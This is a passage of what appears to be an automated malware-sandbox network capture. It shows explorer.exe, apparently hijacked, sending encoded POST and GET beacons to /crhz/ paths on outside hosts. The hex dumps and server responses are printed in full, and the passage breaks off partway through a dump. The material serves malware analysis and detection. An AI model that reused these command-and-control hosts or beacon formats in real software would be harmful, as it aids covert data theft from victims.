                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    30192.168.2.649752173.230.227.17180C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:42:03.605473995 CET891OUTPOST /crhz/ HTTP/1.1
                                                    Host: www.popcors.com
                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.popcors.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.popcors.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 76 47 3d 35 45 72 4a 7e 78 37 42 52 6e 52 67 4a 44 67 6f 76 58 59 64 55 30 44 37 6d 49 30 30 65 33 48 34 38 34 68 37 28 58 43 4c 64 57 6d 64 47 43 33 4d 45 6d 61 6b 7e 5f 75 36 4b 46 57 6e 70 74 67 5a 61 73 41 47 64 61 79 55 62 65 75 64 75 44 43 6f 42 4a 44 48 7a 70 44 33 46 58 74 59 7a 68 77 34 6c 5a 57 4f 6a 54 78 70 4e 33 6d 72 68 44 6e 51 5a 7a 58 58 4b 79 58 59 5a 32 28 70 72 6e 64 45 28 68 33 32 28 64 53 71 44 70 4c 46 58 74 5a 41 56 36 6b 75 71 50 33 4e 53 54 50 76 7e 73 42 48 4e 77 39 79 50 7a 45 53 28 44 70 47 28 4d 4a 31 35 75 65 6f 6c 4e 54 4e 30 43 51 65 6e 33 4c 79 54 43 59 5f 6a 6c 64 38 34 79 31 39 74 4d 6b 74 33 69 4f 51 7a 45 4b 75 55 34 45 7a 4e 65 65 5a 69 57 31 54 32 58 5a 75 44 51 43 4c 46 38 54 6b 55 6a 47 4e 53 79 4c 75 48 55 78 54 58 41 36 37 31 74 69 58 63 6b 78 78 4d 4d 61 30 74 48 46 33 55 62 58 66 44 5a 59 51 33 32 6d 57 4d 6f 63 41 6a 38 48 69 55 42 45 6c 39 5f 78 44 45 67 61 5f 6c 48 48 2d 44 34 69 31 71 68 4f 32 45 77 66 7a 32 75 4e 39 45 55 55 2d 33 34 61 65 44 6c 69 6f 4d 46 45 31 54 4f 7e 6d 55 33 75 4e 64 68 6f 34 6c 69 37 31 70 44 4b 48 48 48 41 4d 46 4e 68 32 37 50 47 48 70 68 67 39 69 4f 55 74 56 61 35 34 70 54 33 74 30 70 34 64 36 77 43 47 75 37 58 76 6e 71 4d 72 4a 53 35 43 41 4e 57 53 6c 43 78 36 77 33 50 56 78 71 46 45 4a 47 5a 32 44 30 68 56 30 53 31 6e 70 69 4b 4f 4f 58 33 6e 77 47 65 77 4b 6d 44 65 4f 48 6d 78 76 31 74 70 56 6c 34 36 47 77 58 78 70 34 6e 73 43 62 51 34 7e 58 46 65 73 32 4d 31 4f 75 73 36 7e 55 78 35 4e 6b 48 61 79 6d 32 47 4d 4f 59 6d 75 67 50 49 6f 57 61 7a 31 4e 54 35 51 31 70 62 70 64 41 6e 51 68 34 58 61 2d 4c 68 70 6a 79 33 6f 5f 58 77 6b 61 65 6d 7a 77 54 63 78 37 6a 31 37 6b 65 51 35 4a 52 66 75 4a 50 35 46 62 6f 36 76 64 66 51 4e 63 32 42 7a 4e 37 61 50 65 33 70 53 33 30 4a 4b 46 42 35 49 61 77 6c 33 4f 63 4a 6e 72 4b 38 4c 75 78 67 67 41 6b 77 6a 69 4e 56 37 57 4c 4c 76 61 32 67 6b 4e 54 72 38 54 66 4b 73 67 4d 6f 7a 62 74 66 64 47 76 38 67 54 68 74 6e 66 41 77 6a 39 5a 37 36 47 72 58 69 54 78 4d 35 4b 47 73 58 52 59 78 4b 37 56 37 41 33 5a 4b 74 65 77 6c 71 4f 43 62 4c 6b 4e 79 50 30 6d 6a 6f 30 64 68 75 37 42 42 62 53 6e 34 70 4c 4f 73 53 61 53 56 50 6b 75 71 69 63 4d 51 6b 51 75 6d 38 4b 74 32 6a 63 6b 42 51 53 51 73 6b 6e 37 52 54 7a 74 51 46 44 65 75 36 62 68 4b 37 6e 6f 30 52 42 58 59 4a 45 35 7a 54 57 53 5a 45 5a 65 4f 54 78 34 49 31 45 38 65 43 2d 58 61 56 73 47 66 70 64 64 5a 77 4a 6d 44 6e 31 67 49 4d 56 45 6a 59 45 76 4d 45 72 5a 54 6c 58 49 6c 7a 36 78 49 39 57 59 38 4a 53 64 77 7e 42 77 33 38 73 61 34 76 64 45 4d 44 47 66 72 56 56 53 49 69 49 66 79 50 64 35 63 56 42 4b 68 74 53 52 4a 75 30 55 6b 54 44 4d 36 6f 4c 57 65 36 4a 4c 54 68 41 6d 68 68 61 51 6c 31 59 64 53 56 78 68 48 79 58 39 50 70 45 32 41 68 51 75 4f 65 67 36 64 33 55 6f 64 54 53 34 38 6c 51 6a 70 31 55 57 44 44 2d 43 33 54 51 67 31 28 5a 71 42 4c 37 37 69 7e 59 39 37 4a 39 52 50 63 4a 54 51 65 62 61 39 47 56 51 6d 37 74 4f 2d 61 73 59 68 28 49 35 5f 71 31 4f 37 62 47 55 32 79 47 4b 52 71 63 38 66 56 33 39 4e 4f 5a 45 4a 4e 2d 72 44 7a 39 57 71 71 6a 4b 31 70 6d 4b 49 33 76 4b 63 64 55 50 6b 4d 66 37 4b 65 38 55 37 4b 45 75 71 76 56 70 46 6c 4a 30 65 45 2d 44 63 4f 56 78 57 7e 66 51 6f 51 58 38 57 4d 31 58 62 57 48 79 31 70 67 47 66 72 4c 37 5a 68 66 4b 69 63 4a 6c 70 38 63 37 70 48 41 4f 54 47 4b 74 6e 6d 39 61 47 68 6d 30 52 4e 66 76 6e 37 50 32 6a 4d 4e 75 54 6c 2d 59 50 66 43 4b 48 73 5f 4c 50 45 76 78 66 57 4a 4b 59 51 64 41 45 47 6c 34 68 73 6a 42 65 71 45 32 49 53 64 56 64 6d 2d 43 50 39 78 77 50 6b 70 36 67 6f 61 69 51 74 58 42 6a 41 48 48 6f 59 43 28 4c 4a 58 6a 49 42 76 52 65 42 79 66 62 6a 32 72 66 68 6b 38 58 6d 32 65 67 65 55 63 45 63 6c 74 66 34 6d 42 37 59 65 37 75 61 4c 51 56 35 31 32 69 73 6c 28 51 76 67 31 5f 30 6a 7e 47 69 35 7e 73 55 46 62 34 44 76 57 4e 30 4c 6a 4d 77 6c 6a 47 68 6e 6d 71 53 72 44 2d 68 4f 35 73 36 51 69 49 6e 2d 48 59 33 47 4f 47 64 6a 4d 4d 28 42 77 4d 28 63 49 30 67 65 57 6f 6b 6b 59 4d 38 2d 32 57 59 41 64 33 41 47 6a 36 75 56 51 33 6f 46 63 39 4b 73 6e 39 73 30 56 7a 65 39 28 4d 6f 45 43 5a 36 57 70 32 39 75 7a 38 7e 4d 7a 44
                                                    Data Ascii: vG=5ErJ~x7BRnRgJDgovXYdU0D7mI00e3H484h7(XCLdWmdGC3MEmak~_u6KFWnptgZasAGdayUbeuduDCoBJDHzpD3FXtYzhw4lZWOjTxpN3mrhDnQZzXXKyXYZ2(prndE(h32(dSqDpLFXtZAV6kuqP3NSTPv~sBHNw9yPzES(DpG(MJ15ueolNTN0CQen3LyTCY_jld84y19tMkt3iOQzEKuU4EzNeeZiW1T2XZuDQCLF8TkUjGNSyLuHUxTXA671tiXckxxMMa0tHF3UbXfDZYQ32mWMocAj8HiUBEl9_xDEga_lHH-D4i1qhO2Ewfz2uN9EUU-34aeDlioMFE1TO~mU3uNdho4li71pDKHHHAMFNh27PGHphg9iOUtVa54pT3t0p4d6wCGu7XvnqMrJS5CANWSlCx6w3PVxqFEJGZ2D0hV0S1npiKOOX3nwGewKmDeOHmxv1tpVl46GwXxp4nsCbQ4~XFes2M1Ous6~Ux5NkHaym2GMOYmugPIoWaz1NT5Q1pbpdAnQh4Xa-Lhpjy3o_XwkaemzwTcx7j17keQ5JRfuJP5Fbo6vdfQNc2BzN7aPe3pS30JKFB5Iawl3OcJnrK8LuxggAkwjiNV7WLLva2gkNTr8TfKsgMozbtfdGv8gThtnfAwj9Z76GrXiTxM5KGsXRYxK7V7A3ZKtewlqOCbLkNyP0mjo0dhu7BBbSn4pLOsSaSVPkuqicMQkQum8Kt2jckBQSQskn7RTztQFDeu6bhK7no0RBXYJE5zTWSZEZeOTx4I1E8eC-XaVsGfpddZwJmDn1gIMVEjYEvMErZTlXIlz6xI9WY8JSdw~Bw38sa4vdEMDGfrVVSIiIfyPd5cVBKhtSRJu0UkTDM6oLWe6JLThAmhhaQl1YdSVxhHyX9PpE2AhQuOeg6d3UodTS48lQjp1UWDD-C3TQg1(ZqBL77i~Y97J9RPcJTQeba9GVQm7tO-asYh(I5_q1O7bGU2yGKRqc8fV39NOZEJN-rDz9WqqjK1pmKI3vKcdUPkMf7Ke8U7KEuqvVpFlJ0eE-DcOVxW~fQoQX8WM1XbWHy1pgGfrL7ZhfKicJlp8c7pHAOTGKtnm9aGhm0RNfvn7P2jMNuTl-YPfCKHs_LPEvxfWJKYQdAEGl4hsjBeqE2ISdVdm-CP9xwPkp6goaiQtXBjAHHoYC(LJXjIBvReByfbj2rfhk8Xm2egeUcEcltf4mB7Ye7uaLQV512isl(Qvg1_0j~Gi5~sUFb4DvWN0LjMwljGhnmqSrD-hO5s6QiIn-HY3GOGdjMM(BwM(cI0geWokkYM8-2WYAd3AGj6uVQ3oFc9Ksn9s0Vze9(MoECZ6Wp29uz8~MzDL7dY6sNJJvotSw6plV2swe2kprdG(jbEbctTHmC_Y_M2jdit26VaOFzqKXFJBVbg3e5QuhPI(q372YC_Q5SX(Rc.
                                                    Jan 30, 2023 13:42:03.745745897 CET892INHTTP/1.1 404 Not Found
                                                    Date: Mon, 30 Jan 2023 12:42:03 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    31192.168.2.649753173.230.227.17180C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:42:06.273947001 CET892OUTGET /crhz/?vG=0GDp9E6kCyw3PTEu7mcwaVDMse4qTFHKiPIjsnORLRuzWwrUUyHW5NbJCCyvt5dATvUBD9WLW/i5ogrnJ/OA7NWjCE9u9zkY8p+SshpKLRL6&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.popcors.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:42:06.428262949 CET893INHTTP/1.1 404 Not Found
                                                    Date: Mon, 30 Jan 2023 12:42:06 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    32192.168.2.649754162.241.2.6680C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:42:11.759207010 CET894OUTPOST /crhz/ HTTP/1.1
                                                    Host: www.thepromotionhunter.com
                                                    Connection: close
                                                    Content-Length: 188
                                                    Cache-Control: no-cache
                                                    Origin: http://www.thepromotionhunter.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.thepromotionhunter.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 76 47 3d 32 4e 70 79 52 74 4f 76 6e 44 6a 4a 64 38 63 6c 51 75 68 61 6a 47 6a 49 36 34 76 6e 62 73 6f 5a 51 54 50 4d 66 52 5a 5a 54 30 5a 30 6a 6d 46 4d 28 48 6e 34 31 41 76 49 50 4e 68 56 53 5f 47 79 34 48 48 34 79 63 32 54 77 37 44 59 5a 4a 42 31 39 36 78 34 46 35 49 63 57 57 57 49 73 44 56 35 73 56 61 61 72 6f 67 52 46 48 77 4a 41 73 48 6d 70 45 6e 6e 46 35 45 62 69 77 43 6b 30 56 5a 37 56 53 53 45 54 78 61 58 6b 61 65 56 79 73 51 54 70 6e 53 51 28 46 32 6b 4f 32 42 48 69 52 39 55 33 45 31 31 28 6d 79 4d 4d 56 30 77 37 6f 7a 43 34 5a 58 6d 66 44 6b 2e 00 00 00 00 00 00 00 00
                                                    Data Ascii: vG=2NpyRtOvnDjJd8clQuhajGjI64vnbsoZQTPMfRZZT0Z0jmFM(Hn41AvIPNhVS_Gy4HH4yc2Tw7DYZJB196x4F5IcWWWIsDV5sVaarogRFHwJAsHmpEnnF5EbiwCk0VZ7VSSETxaXkaeVysQTpnSQ(F2kO2BHiR9U3E11(myMMV0w7ozC4ZXmfDk.
                                                    Jan 30, 2023 13:42:12.033816099 CET896INHTTP/1.1 404 Not Found
                                                    Date: Mon, 30 Jan 2023 12:42:11 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <https://thepromotionhunter.com/wp-json/>; rel="https://api.w.org/"
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Vary: Accept-Encoding
                                                    Content-Encoding: gzip
                                                    Content-Length: 10932
                                                    Content-Type: text/html; charset=UTF-8
                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 ed 72 e3 46 96 e5 6f eb 29 b2 e8 b0 45 da 4c 10 e0 b7 40 51 9e 2e 7f 8d 23 ba ba 1d 2e f7 4c 6c d8 8e 8a 24 70 09 a4 95 c8 c4 64 26 f8 51 6a 45 ec ab 4c 4c c4 fe db 17 d8 bf 7e 93 7d 92 bd 09 90 14 45 81 a2 4a 55 fd b1 d3 ad 2a 92 40 e6 bd e7 9c 7b ee b9 7c f1 d5 1f bf fc f1 7f 7c ff 35 49 6d 26 ae ce 2e dd 0f 11 4c 26 d3 46 6e e9 cb 1f 1a ee 0c 58 7c 75 f6 d1 65 06 96 91 28 65 da 80 9d 36 fe f4 e3 37 74 dc 20 9d dd 8d 64 19 4c 1b 0b 0e cb 5c 69 db 20 91 92 16 24 56 2e 79 6c d3 69 0c 0b 1e 01 2d 5f da 84 4b 6e 39 13 d4 44 4c c0 34 28 71 f6 60 ce b5 9a 29 6b ce 77 20 e7 19 5b 51 9e b1 04 68 ae c1 91 84 82 e9 04 ce cb 46 cb ad 80 ab ef 7f fb cf 84 4b 44 f8 ed bf 14 01 e9 5a 35 8b 19 f9 f4 e3 71 37 08 26 e4 c7 14 48 ae 55 a6 2c 57 92 a4 05 22 eb cb 4e d5 7b 76 29 b8 bc 26 1a c4 f4 3c 96 c6 91 cc c1 46 e9 39 49 f1 69 7a de e9 d8 14 76 cd 55 af 17 a9 ac e2 df f5 36 98 c0 0b c9 2c 34 88 5d e7 e8 07 cb 73 c1 23 e6 ba 3a da 98 cf 57 99 c0 2b c7 39 6d 7c 03 10 93 9c 69 56 2b 8d 7c aa d9 7f 14 6a d2 a8 24 34 52 6b 73 13 1e 13 d2 99 23 58 a7 f1 de 72 62 40 cf 33 b4 fc b7 ff d4 5c 99 0f 26 0f 3f 0e d5 ec eb 34 91 e6 b9 bd 3a 5b 72 19 ab a5 f7 66 99 43 a6 7e e5 af c1 5a 2e 13 43 a6 e4 a6 31 63 06 fe a4 45 23 dc 10 fc dc f9 b9 63 bc a5 a7 74 f2 73 a7 0c 84 f9 19 c1 35 fc dc 29 9b 7f ee 04 7d cf f7 fc 9f 3b a3 ee 6a d4 fd b9 d3 68 37 60 65 b1 df cb 65 82 2f 66 91 3c 0f 0f 1b 4b 34 fc fd ba 02 c4 27 f7 ae 0a 1d 41 23 bc 69 60 e2 d0 da b2 6d 83 5f c2 d7 3b f2 73 67 99 53 2e 23 51 c4 8e f2 57 53 1e 94 cd 14 77 07 38 b7 97 71 e9 fd 6a be 58 80 9e 0e bd c0 0b 1a b7 b7 93 b3 ce 67 2f 70 21 dc 90 39 17 40 f0 97 15 56 d1 04 24 68 24 8f c9 67 9d b3 17 f3 42 46 8e ae 09 6d d6 b6 ad 9b 05 d3 44 b6 75 5b b5 f9 94 79 91 06 ac fc 5a 80 db 48 b3 11 31 b9 60 a6 d1 6a e7 53 ee 25 60 bf 54 a8 71 65 3f fd 74 ff ad d9 e8 c6 8d d6 64 0b 4c 0c 42 6f 80 d9 f4 b5 d5 b8 30 6f 8e 53 7e 99 32 fd a5 8a a1 0d d3 66 ee 45 38 87 fe 01 22 db f4 db 7e 9b 7b 4b 1e db 14 7f 53 e0 49 6a 91 d1 c3 21 c4 8f 0e 9f 79 2e 9b eb a6 c5 d1 da d0 c2 72 bf 85 95 56 7d c5 2c fb d3 0f bf 6f b6 5a 13 0d b6 d0 92 3c 1f d7 6e 70 61 3a 9d de c3 be dd 0d 16 35 a1 1a cb 3e 74 aa 0a 2c da 60 3d a3 a3 29 3a e0 c5 30 c7 ed 58 cf ae 73 98 36 9c 53 9d 5f 19 da 59 55 b6 99 b3 70 d3 6f 5e ae 7f 64 c9 1f 58 06 cd 46 0a 0c ed fc c9 ff c5 a9 03 19 7f 99 72 11 37 2d ea 50 ba a9 a6 bf d3 9a ad 9b 8d b9 60 2e 61 55 a2 5a c8 66 8a 3c 57 da 9a e9 0d 60 28 d6 38 93 4c c2 17 7e fb ee ed eb 55 04 b9 fd 06 1b f1 fc b6 ad a7 fe 44 5f 2a 4f 80 4c 6c 3a d1 9f 7f de ba 43 f9 49 fd a4 7f f9 65 7a 17 96 d6 0d 9f 37 f3 4f 3f bd b3 af 65 96 dc 46 29 ae d2 8d f6 12
                                                    Data Ascii: rrFo)EL@Q.#.Ll$pd&QjELL~}EJU*@{||5Im&.L&FnX|ue(e67t dL\i $V.yli-_Kn9DL4(q`)kw [QhFKDZ5q7&HU,W"N{v)&<F9IizvU6,4]s#:W+9m|iV+|j$4Rks#Xrb@3\&?4:[rfC~Z.C1cE#cts5)};jh7`ee/f<K4'A#i`m_;sgS.#QWSw8qjXg/p!9@V$h$gBFmDu[yZH1`jS%`Tqe?tdLBo0oS~2fE8"~{KSIj!y.rV},oZ<npa:5>t,`=):0Xs6S_YUpo^dXFr7-P`.aUZf<W`(8L~UD_*OLl:CIez7O?eF)
                                                    Jan 30, 2023 13:42:12.033860922 CET897INData Raw: 43 29 b8 74 83 aa bc e1 5c c6 70 4c 1b 43 df 27 bd 6e be 22 bf d3 9c 89 06 6e ef 26 c2 ca 4a 7e b8 59 9a 69 fe 14 74 47 17 e3 51 7b 38 f0 7b 17 ed 71 d7 1f b4 2f c6 17 83 ea fd 97 f6 83 eb de fe 75 eb 8b 17 41 f8 02 41 06 83 de 60 d8 1e 0c c7 5d
                                                    Data Ascii: C)t\pLC'n"n&J~YitGQ{8{q/uAA`]>ln}^Ew{{sKyTt9[*__F+=.QeAIun.!6=|N6kr[{w5yo{N._,^O_
                                                    Jan 30, 2023 13:42:12.033884048 CET898INData Raw: 03 ef cc 43 35 1a 6d b9 cd ef 69 3c dc 84 5a 80 46 75 cb 30 e5 71 0c f2 f6 41 c1 91 55 85 cb 14 34 34 ab f2 52 4d a4 84 d2 a5 05 e5 19 ce 75 5d 9d b5 5a 84 dd 54 b7 5c 62 17 b7 a7 c2 8e 31 8e 0e b7 7c 70 fb e6 cd ac b0 56 c9 9b ca 1f ea bc 45 ff
                                                    Data Ascii: C5mi<ZFu0qAU44RMu]ZT\b1|pVER4K<B5GY$7-ylSMgu0BQ5H{&[1AKfwFclpaQ(&T 54<E&&l&+dUSYLj;R+%\gWs
                                                    Jan 30, 2023 13:42:12.033907890 CET899INData Raw: be 30 6c 6b 01 21 fa c8 e3 7b 1d 3f 95 17 9f 4d 37 65 48 57 35 fe b2 eb 74 47 4f ec 2e b3 78 d8 5f 1d 3e 11 61 a6 ac 55 d9 21 c4 e6 f4 89 18 ce fa 43 84 f2 ec 89 fd a5 d5 bf 3c c7 b9 83 ce 77 76 ee a0 ff 39 ce 1d 40 3c c3 b9 03 84 47 9d e3 59 f2
                                                    Data Ascii: 0lk!{?M7eHW5tGO.x_>aU!C<wv9@<GYS$1M9Kb&eZ3 ]^?p1p'dg%<'Bf^p42lIs,NL:$&Z37)M4[c9Q|rX3/kr&\:hQ}/xL5X:Qd\l
                                                    Jan 30, 2023 13:42:12.033931971 CET901INData Raw: bf 85 90 0c 07 7e be aa 2f 5c f2 18 36 55 41 d7 77 65 e4 d6 c3 3a c3 2d d0 99 50 d1 b5 41 b6 9c c5 b1 d3 66 55 1e 92 05 d3 cd 7b 58 5a 29 d4 bf 57 d3 9a ec 3a 30 ad 56 65 27 9b aa b2 96 23 4f 99 d9 aa db dc ee 09 d0 3c 49 ed 49 b4 b2 6a 4f 84 80
                                                    Data Ascii: ~/\6UAwe:-PAfU{XZ)W:0Ve'#O<IIjO&WtL@LACPHA"<BJ(QIsbh7S<9O`CJekH0c>6p2KCk7oy;ii]5k{MiGB-TfU \(mr.d
                                                    Jan 30, 2023 13:42:12.033955097 CET902INData Raw: d0 96 3f 1d 6a 5b 5e e7 b4 60 d1 35 9a 18 5d 27 5a 15 32 de 20 1e 1e 3c b6 00 87 50 b7 81 4d 62 b8 49 31 ec 6c fd 5e 24 87 60 35 7c cb 94 5b 78 2f 92 12 a1 2e 01 0c 73 9d 73 f9 7e 3e ed 50 6a 18 16 7c c1 63 aa 21 7e 2f 86 1d 4a 0d 83 28 32 2e 55
                                                    Data Ascii: ?j[^`5]'Z2 <PMbI1l^$`5|[x/.ss~>Pj|c!~/J(2.URE<I\$p;;HPGg0dXGBCPU@5<3fFJZ}/-H5^+tH/} u{CgJ{/-umtVnRh~!H2^v
                                                    Jan 30, 2023 13:42:12.033977032 CET903INData Raw: 07 56 46 33 15 33 b1 af af 3f 98 fb 83 a0 37 e8 8e 46 6c 36 f7 67 7e df 1f 9f d0 d7 3d 54 28 b8 bc 26 1a c4 b4 e1 f4 19 14 c8 72 ee 2d 3d a5 93 4e 83 e0 52 e7 77 37 c7 a5 ff 6a 50 64 83 74 ae f6 f0 be 8e b9 fd d3 0f df 35 88 5d e7 30 6d b0 3c c7
                                                    Data Ascii: VF33?7Fl6g~=T(&r-=NRw7jPdt5]0m<=Wh^q+_=tyy qXfL9[Gw]Q>m1{^3H!Y4J7HiW:^1d^PtR`LkfZ+)!AL-W!49+;.n.ivC-Ko+}
                                                    Jan 30, 2023 13:42:12.033999920 CET905INData Raw: f8 50 25 c6 a5 fa ea ec 32 e6 0b 12 09 66 4c 19 1c 07 87 a9 51 d1 b5 c1 c0 a4 c0 62 b7 8a dd 75 79 43 2d 64 39 6e 04 68 ce b4 6d dc c7 48 99 a1 89 50 33 26 f0 36 8e b9 4c 08 37 54 b0 b5 2a 2c 8d 94 34 56 33 2e 21 26 3b b4 44 ab 22 47 94 8f ce 3e
                                                    Data Ascii: P%2fLQbuyC-d9nhmHP3&6L7T*,4V3.!&;D"G>.,830yT,B`r|.`P]w@B\6v-F:S,\0h%+}D~t?4rd$0G#Mr2Z'`7A4QBpcy)@&iQs
                                                    Jan 30, 2023 13:42:12.034023046 CET906INData Raw: cb 5f 77 f2 16 9d e8 b8 01 aa 61 2e 3b 68 0b 9e 54 ee e1 03 66 0e bf 31 dc d9 d5 59 f5 76 86 7f 65 14 37 01 ab 0c 09 17 4c 37 29 c5 05 d0 5c 83 01 4b a9 c9 59 c4 65 42 e9 c8 6f 35 aa 35 a4 3c 8e 41 4e 1b 56 17 50 b3 55 6c 00 b7 9a 2d cf 65 27 63
                                                    Data Ascii: _wa.;hTf1Yve7L7)\KYeBo55<ANVPUl-e'c\Os,B@s-.)rH1qR7d%Z[G@X>\J0]=Cu]Ba'c6l|hVG3.q4r+=d$0GMr2NHebN


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    33192.168.2.649755162.241.2.6680C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:42:14.433737040 CET908OUTPOST /crhz/ HTTP/1.1
                                                    Host: www.thepromotionhunter.com
                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.thepromotionhunter.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.thepromotionhunter.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 76 47 3d 32 4e 70 79 52 74 4f 76 6e 44 6a 4a 62 74 4d 6c 57 4a 4e 61 72 47 6a 4c 31 59 76 6e 4d 38 6f 64 51 54 44 4d 66 55 35 77 54 43 4a 30 6d 6c 39 4d 28 6c 50 34 35 67 76 49 62 39 68 52 63 66 47 6f 34 44 76 61 79 63 6d 70 77 39 6a 59 5a 71 35 31 37 5f 74 35 4c 70 49 65 53 57 57 4a 73 44 55 35 73 56 4b 57 72 70 68 5a 46 48 6f 4a 41 61 7a 6d 34 45 6e 6d 50 5a 45 62 69 77 43 53 30 56 59 71 56 53 4b 4d 54 31 7e 48 6b 6f 57 56 31 4e 77 54 71 45 71 52 35 46 32 67 52 47 41 50 69 79 55 48 33 45 6f 77 30 7a 53 78 5a 6b 67 47 7a 50 32 61 68 61 44 4d 42 6b 48 42 62 78 35 64 46 34 73 32 50 65 6a 42 52 35 35 36 71 68 68 42 32 75 42 50 47 35 73 46 49 39 37 39 78 67 53 77 76 33 28 41 37 4a 72 6c 34 58 4e 5f 6d 71 54 52 32 6e 55 76 53 68 46 39 47 76 46 39 41 53 5a 4d 74 75 71 7a 44 64 4b 6f 4c 76 50 5a 63 76 56 6c 6d 76 69 6a 31 78 70 58 61 4d 4c 6e 6e 6c 34 79 75 42 6f 5f 5a 6c 41 56 72 4b 43 74 6f 41 6d 47 62 4b 56 68 6b 34 45 59 47 61 41 4d 44 75 34 36 79 31 7e 31 77 33 50 51 68 61 52 69 48 33 6a 52 7e 52 75 4e 58 62 77 51 42 64 